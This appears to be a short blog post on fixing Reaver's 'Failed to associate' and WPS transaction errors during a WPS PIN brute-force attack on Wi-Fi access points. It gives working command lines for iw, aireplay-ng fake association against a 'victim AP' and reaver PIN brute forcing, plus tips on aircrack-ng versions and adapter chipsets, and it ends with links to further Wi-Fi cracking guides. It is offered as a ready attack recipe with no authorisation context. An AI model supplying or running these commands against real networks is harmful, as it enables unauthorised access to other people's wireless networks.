Fix for Reaver Errors: WARNING: Failed to associate with and WPS transaction failed (code: 0x03), re-trying last pin
If you always get stuck on the error ‘WARNING: Failed to associate with’ while using Reaver with every APs, you can try the follow fix.
Reaver says us it cannot associate with. If it cannot, let it do any tool which can. This is can be done by aireplay-ng.
Open two consoles. In the first window set the channel a victim AP:
sudo iw dev <IFACE> set channel CHANNEL
In the same window use aireplay-ng to associate:
sudo aireplay-ng <IFACE> -1 120 -a <MAC> -e <ESSID>
In the next console use reaver for brute-force pin:
sudo reaver -i <IFACE> -A -b <MAC> -v --no-nacks
This solution helps me to solve
WARNING: Failed to associate with
It is said the problem raised with Aircrack-ng 1.2 RC 2. So one more solution is to downgrade to Aircrack-ng 1.2 RC 1. Also it is also known the problem is common among Wi-Fi adapters with Ralink Chipset, RT3070 (i.e. Alfa Network AWUS036NH). If your AWUS036NH does not work with Reaver, try it with Bully.
Also Chipset Atheros AR9271L (i.e. Alfa Network AWUS036NHA) always works fine with Reaver either with Bully.
Hope it will help you. Please share your experience in comment: is the solution useful for you or not?
- Reaver cracked WPS PIN but does not reveal WPA-PSK password (SOLVED) (100%)
- WiFi-autopwner: script to automate searching and auditing Wi-Fi networks with weak security (83.8%)
- Automated Pixie Dust Attack: receiving WPS PINs and Wi-Fi passwords without input any commands (83.8%)
- Effective WPS PINs attack based on known PIN and PIN generation algorithms (83.8%)
- How to hack Wi-Fi using Reaver (83.8%)
- Hacking Wi-Fi without users (RANDOM - 53.4%)